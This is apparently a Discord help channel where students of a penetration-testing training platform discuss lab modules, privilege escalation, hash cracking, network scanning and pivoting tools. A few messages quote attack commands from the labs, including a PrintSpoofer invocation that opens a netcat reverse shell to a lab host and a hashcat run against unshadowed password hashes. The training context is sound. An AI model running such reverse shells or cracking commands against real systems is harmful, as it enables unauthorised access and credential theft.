parallel_read returned NT_STATUS_IO_TIMEOUT

#

willbe grateful if helping

muted trail
#

thank you

coarse void
#

Np

stray plinth
#

I have a general question about HTB

vital adder
iron plaza
#

what is the purpose of "/format:hashcat" in Rubeus? I am asking this because I cracked the hash using hashcat with and without using that tag and got the clear text pass.

azure raptor
#

is there are red teams 👀

unique cape
#

: i need some help with the nmap module if thats alright

silk valve
#

Is there a channel for the new cdsa path ?

tiny mango
#

I own this now lmao

rustic sage
#

hello any help : module ATTACKING ENTERPRISE NETWORKS - Exploitation & Privilege Escalation : using c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.15.128 8443 -e cmd" tried multiple PrintSpoofer versions still got error:
172.16.8.20[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 216.

rustic sage
quick crane
#

who can help me the WINDOWS PRIVILEGE ESCALATION-Credential Hunting,in this first question I find so many password but not on is right

fiery berry
quick crane
fiery berry
#

if the output is overwhelming try one extension a time

quick crane
#

but it have so many file and I find some see like right password but are all error

quick crane
fiery berry
fiery berry
# quick crane also not have

did you put some effort looking at the output of the command? The file you're looking for is in a path which will stand out from the others and it has a ||.xml|| extension

quick crane
fiery berry
quick crane
#

yeah,for begin I can't see it

tiny mango
#

I didnt saw the channel name and all

#

my bad

mossy hatch
#

Module name : Password attacks
Section name : Passwd, Shadow & Opasswd
can someone help me with hashcat, ||i found the backup folder and exported passwd.bak and shadow.bak and then i mutated the wordlist but hashcat can't find the password for the root user i did hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o unshadowed.cracked|| i dont know what to do

tiny mango
#

yo where can I find account identifier?

#

can u help me w that?

hallow kiln
#

you need an account on the main platform, unless you have silver annual

tiny mango
tame apex
#

Is there a way to check what modules are included in the new SOC path?

novel matrix
hallow kiln
tame apex
#

I done Comptia cysa+ now I wanted to do The free modules and start the pentest path after, would you recommend doing SOC first and Pentest after or would that be a money sink ?

mossy hatch
hallow kiln
reef anvil
#

Hello friend. Could you give me some hints?

#

Hello gentlemen and ladies! could someone provide me some hints for Brute Forcing Usernames /question2 ?
Tried burp, ffuf, hydra and plenty userlists with no luck. Also applied various regex.
Thanks in advance!

bleak goblet
#

Friends, how can I bypass the 403 forbiden page because I know that the server has understood my request, but unfortunately I do not have permission to access that page.

quick crane
#

I need help for this question "Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system."

dusk torrent
#

Hi guys. For the Footprinting Module -DNS I'm on the question: _What is the FQDN of the host where the last octet ends with "x.x.x.203"? _

I already have the answer but I'm sure I went about it the wrong way and I'm looking for a more efficient way to go about it. basically, how did you find which wordlist to use with dnsenum? I used the right one by sheer dumb luck, but if not I would have had to trial and error across every subdomain. is there something specific you look for or know?

valid sinew
#

Module: NETWORK ENUMERATION WITH NMAP - Saving the Results

HI Guys

While running the XML to HTML conversation on my VM box that is connected to the VPN I am getting the following error. I google searched but it was giving 100s of solutions that were not in connection to this.

Any Ideas

xsltproc target.xml -o target.html
warning: failed to load external entity “target.xml”
cannot parse target.xml

Many Thanks

Kapz

gloomy bramble
bleak goblet
#

Go to the Microsoft Community and you will find help there

rustic sage
quick crane
quick crane
rustic sage
#

i know the question, i’m asking what module it’s from

quick crane
dusk torrent
quick crane
#

who can help me

rustic sage
# quick crane who can help me

sorry forgot to reach back out, i’ll be back in a few hours if no one is able to help you, but usually you can just do exactly what the section did and get the same results

rustic sage
#

sure, i’m not at my computer though so i don’t have my notes to assist😅

rustic sage
#

i don’t do calls😛

quick crane
quick crane
rustic sage
#

like i said i’ll be back in a few hours if no one can help you by the time i return

#

but if the question says “use the techniques shown” you can probably just use the commands in the section and retrieve the flag

quick crane
vital adder
rotund crane
#

hey i'm new at cyber security , i want to ask if anyone using ubuntu linux ?

rugged patio
#

the tutorials are using parrot, but i just started yesterday 😂

vital adder
#

but in short you can use whatever the hell you want

brittle gorge
#

I am able to ping an IP provided in the interactive exercises but I am not able to open the web page it is holding at Port 80.

I am connected to an academy VPN. I have already re-generated it once by switching to a different eu based server, for more context.

quick crane
#

who can help me

brittle gorge
brittle gorge
#

Someone will come along and help you.

quick crane
brittle gorge
quick crane
quick crane
#

or can I dm you

brittle gorge
# quick crane so can you help me

If you can tell me have you tried everything taught to you in that section since the question really takes its basis on what techniques they've taught in the entire section above the question?

Since, it is mostly trying out different ways to sweep or search through the system to find different useful files. All those commands that are in the module.

quick crane
brittle gorge
#

And if you get overwhelming amount of results from the commands then try using google to find out how you can filter those results or be patient and look through them. Try to utilise all the information which is at your disposal related to the user.

brittle gorge
vital adder
brittle gorge
#

There are no available instances. Please try again later.

#

not even getting instances lol

vital adder
#

oh if that's the issue there is nothing you can do lol

sly dome
#

pwnbox is not working

#

read general

brittle gorge
sly dome
#

im telling to you

#

xd

vital adder
#

also your target wasn't docker right?

brittle gorge
sly dome
#

do not contact anyone

#

they know there is a problem

#

just wait

sly dome
#

and interact with them from my Parrot

brittle gorge
sly dome
#

let me try

brittle gorge
# sly dome let me try

I am able to ping those targets but I am not able to interact with webpage served at port 80 of the target ip as intended.

sly dome
#

works for me

brittle gorge
#

When I try to curl, it shows

curl: (56) Recv failure: Connection reset by peer

And in browser, it shows Unable to Connect

sly dome
brittle gorge
unreal crane
#

wait hang on i'm doing this exact module rn and my machine isnt working

#

ok i lied its fine again

sly dome
#

skill issue 😛

brittle gorge
unreal crane
#

ok yeah no i think mine is back but i was def getting 'no route to host' or whatever in burpsuite

#

so maybe its just being a bit of a menace rn??

brittle gorge
#

Okay, so I am now able to spawn a pwnbox

#

Okay, reset the target and now it is working in the pwnbox

sly dome
#

lets go !

brittle gorge
#

Although I feel, my VPN is still facing some issue. But I will finish this module in pwnbox. Thank you all.

gloomy bramble
tired flax
#

Hello Someone did the NTLM RELAY ATTACKS Course? I wanna ask if they give Vulnerable machines in the course to test the attacks

orchid pine
#

im using updog to transfer file to my attack host but i cannot

vital adder
orchid pine
#

when trying to uplaod it to updog

#

i got that error

#

never mind

#

i fixed it out

#

feeling stupid sometimes XDD

rustic sage
#

awh who deleted the macOS question 😦 best operating system

#

dm me 🙂

orchid pine
#

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2898:4d63:7808:6639%4
IPv4 Address. . . . . . . . . . . : 172.16.5.35
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.16.5.1

Ethernet adapter Ethernet1 2:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3dac:3388:e75f:b925%5
IPv4 Address. . . . . . . . . . . : 172.16.6.35
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :

#

yo guys this is the same network no?

orchid pine
#

but ehrn we look to the subnet its /16

#

no

sly dome
#

review your networking basics

orchid pine
sly dome
#

you are asking for a direct solution

orchid pine
#

i asked that i know the subnet mask is /16 why them the network is /24

#

if you can guide some one thank you

#

if not

#

no need to talk

sly dome
#

please formulate the question in a way we understand

sly dome
#

/16 is not a subnet mask, it is a CIDR

#

a subnet mask is a 32 bits number

#

in the form X.X.X.X where X is 8 bits usually in decimal form

brittle gorge
old ledge
#

Isnt cidr the same as a subnet masks but shortened? Windows and cisco routers still use the old format but linux uses cidr to note masks

slate gate
#

Ye

brittle gorge
old ledge
#

Yep!

sly dome
#

cidr is a model

#

strictly talking

#

a way of interpreting ip addresses

#

what happens is subnet mask agree with CIDR number

#

it is a convention

sly dome
#

that is how i do it

sly dome
brittle gorge
#

what are you trying to do bro?

potent blade
#

hi guys, im trying to crack the Backup.vhd for the password hard module, im using the mutatedpassword list. am i in the right path for using this wordlist?

sly dome
#

it is way easier

brittle gorge
sly dome
#

it is something called mental subnetting

#

i explained above

brittle gorge
#

okay. He will try whatever suits him the best

sly dome
#

you are not doing and operations in real life lets be honest...

orchid pine
sly dome
#

yea it works, ligolo-ng right?

orchid pine
#

yes

sly dome
#

when you learn it, it is super cool

#

good luck man

orchid pine
#

its is and way easier

sly dome
#

waaaaaaaaaaaay

orchid pine
#

with listen-add

sly dome
#

hahahaha

#

we told u

orchid pine
#

its just i can ping but the jhost discovery telling 0 host is up

rustic sage
#

although for the pivot module you should learn the other tools in case you ever need them

sly dome
#

he is having a lot of technical problems

#

with those other tools

rustic sage
#

rpivot is the only one i remember hating

sly dome
#

iirc he was on socksoverrdp but idk now

#

i'd just stick to chisel+socat and ligolo-ng xD

hallow kiln
#

dnscat was like suuuuuper slow, you say "dir" and it takes 2 days

rustic sage
#

oo i did hate that one too

sly dome
#

isnt this academy teaching us to think out of the box

hallow kiln
#

nothing beats ligolo-ng, I did the skills assessment with it and it was magical

sly dome
#

if a tool is not working for me and i reach the same solution with other tool...

#

let's be fair there

orchid pine
#

is better

#

ofc

sly dome
#

define better

hallow kiln
#

sure, knowing all the tools is advised, you never know what you're gonna run into

rustic sage
#

obviously everyone is starting to learn and use ligolo-ng, but the point i was trying to make is if it ever doesn't work you can fall back on those other tools

sly dome
#

ah yes

orchid pine
#

yo guys what worng with my nmpa scan

#

┌──(shadowalker㉿kali)-[~]
└─$ nmap -sn 172.16.6.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 12:25 CDT
Nmap done: 256 IP addresses (0 hosts up) scanned in 105.20 seconds

sly dome
#

for host discovery i just run custom for loop

#

with dev tcp under common ports

orchid pine
#

oh oki

#

a ping sweep

sly dome
#

yea

#

but not with ping

#

with tcp

sly dome
#

coz maybe machine has pings disabled

sly dome
hallow kiln
#

yup

sly dome
#

-sn -Pn -sT

#

what does it do?

dim hound
#

Or firewall that can block ICMP traffic 👀

orchid pine
#

with Pn

sly dome
#

i think it does the same as echo '' > /dev/tcp/ip/port?

hallow kiln
#

nmap -Pn -sT -p3389 172.16.6.0/24 --open

#

or 445

#

88 to find a domain controller

sly dome
#

i still prefer the for loop

#

nmap is too noisy

hallow kiln
#

not if you're checking for a single port or two

sly dome
#

how many packets does it send

hallow kiln
#

you can limit that if you want

sly dome
#

i know

hallow kiln
#

it's good to know how to be stealthy, of course, but that falls more under red teaming

sly dome
#

also he can try ping sweep in the victim machine

#

no need for ligolo there tho

#

and looking into arp table

rustic sage
#

ping sweep first 🙂
nmap second

sly dome
#

yea

sly dome
hallow kiln
#

I did use both ways at different parts of the assessment for variety

sly dome
#

i mean i've never used -sn flag

rustic sage
#

-Pn -n --disable-arp-ping is my goto

sly dome
#

several ways as usual

hallow kiln
#

I've used it, but in this case looking for ports you know will be open does the same thing

sly dome
#

if you can upload files to the machine you can do it with nmap "locally"

hallow kiln
#

88 and 445 are great ones to look for in an AD environment to get an overview of hosts

#

then more detailed scans

sly dome
#

in CPTS i think we wont get a bunch of active hosts in the internal right?

hallow kiln
#

no idea how big the environment is

sly dome
#

w.e.

#

just scan'em all xD

hallow kiln
#

but obviously would be less than a corporate network

rustic sage
#

most of the hosts are going to be internal

sly dome
#

actually

rustic sage
#

double pivot probably not much (one to two)

sly dome
#

cool cool

hallow kiln
#

not a problem with ligolo-ng, you can just stack pivots all you want

rustic sage
#

not if ligolo doesn't work 🙂 which is the point i was making earlier

sly dome
#

but if i get +30 active hosts in the exam i think i will just give up xD

rustic sage
#

i wouldn't be surprised either if they added an attacking cross forest trusts

orchid pine
#

just finished the module

rustic sage
hallow kiln
orchid pine
#

was so fun i learned a lot of things thx for anyone who helped me her

hallow kiln
#

how far into the path are you?

sly dome
sly dome
rustic sage
#

i haven't taking the exam or know anything about it so don't take what i say to heart

sly dome
#

following the bunny track

hallow kiln
#

ah, I'm just going for CPTS

sly dome
#

13 modules from CBBH are on CPTS

#

so im just doing the web part first

hallow kiln
#

I might do the path later to get more into the web stuff, but CPTS is my goal right now

sly dome
#

73% CBBH is 38% CPTS

#

and completed is 13/28=46%

#

almost half of the CPTS is CBBH

hallow kiln
#

it'll just be the reverse for me

sly dome
#

you will have 7 modules left

#

under CBBH

#

easy

hallow kiln
#

considering how much I hate web, probably not easy per se

#

Active Directory is my jam

sly dome
#

you do not know you love it